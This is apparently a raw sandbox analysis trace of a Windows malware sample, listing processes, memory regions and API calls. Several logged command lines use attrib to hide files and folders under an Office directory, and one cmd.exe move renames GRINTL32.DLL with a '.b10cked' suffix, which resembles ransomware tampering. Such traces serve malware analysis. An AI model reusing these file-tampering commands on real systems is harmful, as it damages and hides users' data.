os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "280" os_parent_pid = "0xef8" cmd_line = "attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22516 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22517 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22518 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22519 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 22520 start_va = 0xb60000 end_va = 0xb66fff entry_point = 0xb60000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 22521 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22522 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22523 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22524 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 22525 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22526 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22527 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22528 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 22529 start_va = 0x1f0000 end_va = 0x256fff entry_point = 0x1f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22530 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 22531 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 22532 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22533 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 22534 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22535 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22536 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 22537 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22538 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22539 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22540 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 22541 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22542 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22543 start_va = 0x260000 end_va = 0x327fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 22544 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22545 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 345 os_tid = 0xfb4 Process: id = "282" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16920" os_pid = "0x908" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "280" os_parent_pid = "0xef8" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22546 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22547 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 22548 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 22549 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 22550 start_va = 0xcd0000 end_va = 0xcd6fff entry_point = 0xcd0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 22551 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22552 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22553 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22554 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 22555 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22556 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22557 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22558 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22559 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 22560 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 22561 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 22562 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22563 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 22564 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22565 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22566 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 22567 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22568 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22569 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22570 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 22571 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22572 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22573 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 22574 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22575 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 346 os_tid = 0xd88 Process: id = "283" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16920" os_pid = "0xea8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "280" os_parent_pid = "0xef8" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22576 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22577 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22578 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22579 start_va = 0x80000 end_va = 0x86fff entry_point = 0x80000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 22580 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 22581 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22582 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22583 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22584 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 22585 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22586 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22587 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22588 start_va = 0x110000 end_va = 0x176fff entry_point = 0x110000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22589 start_va = 0x200000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 22590 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 22591 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 22592 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22593 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 22594 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22595 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22596 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 22597 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22598 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22599 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22600 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 22601 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22602 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22603 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 22604 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22605 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 347 os_tid = 0xf3c Process: id = "284" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16920" os_pid = "0xf4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22643 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22644 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22645 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22646 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 22647 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22648 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22649 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22650 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22651 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 22652 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22655 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22656 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22657 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22658 start_va = 0x190000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 22659 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 22660 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22661 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22662 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22663 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22664 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22665 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22666 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22667 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22668 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22669 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 22670 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22671 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22672 start_va = 0x1a0000 end_va = 0x1a6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 22673 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 22674 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 22675 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 22676 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 22677 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 22678 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Thread: id = 348 os_tid = 0xed8 [0167.084] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfbd4 | out: lpSystemTimeAsFileTime=0x2cfbd4*(dwLowDateTime=0x9ade94a0, dwHighDateTime=0x1d440a9)) [0167.084] GetCurrentProcessId () returned 0xf4c [0167.084] GetCurrentThreadId () returned 0xed8 [0167.084] GetTickCount () returned 0x31831 [0167.084] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfbcc | out: lpPerformanceCount=0x2cfbcc*=22387291684) returned 1 [0167.084] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0167.084] __set_app_type (_Type=0x1) [0167.084] __p__fmode () returned 0x76b331f4 [0167.085] __p__commode () returned 0x76b331fc [0167.085] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0167.085] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0167.085] GetCurrentThreadId () returned 0xed8 [0167.085] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xed8) returned 0x38 [0167.085] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0167.085] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0167.085] SetThreadUILanguage (LangId=0x0) returned 0x409 [0167.087] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0167.087] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfb64 | out: phkResult=0x2cfb64*=0x0) returned 0x2 [0167.087] VirtualQuery (in: lpAddress=0x2cfb9b, lpBuffer=0x2cfb34, dwLength=0x1c | out: lpBuffer=0x2cfb34*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0167.087] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfb34, dwLength=0x1c | out: lpBuffer=0x2cfb34*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0167.087] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfb34, dwLength=0x1c | out: lpBuffer=0x2cfb34*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, 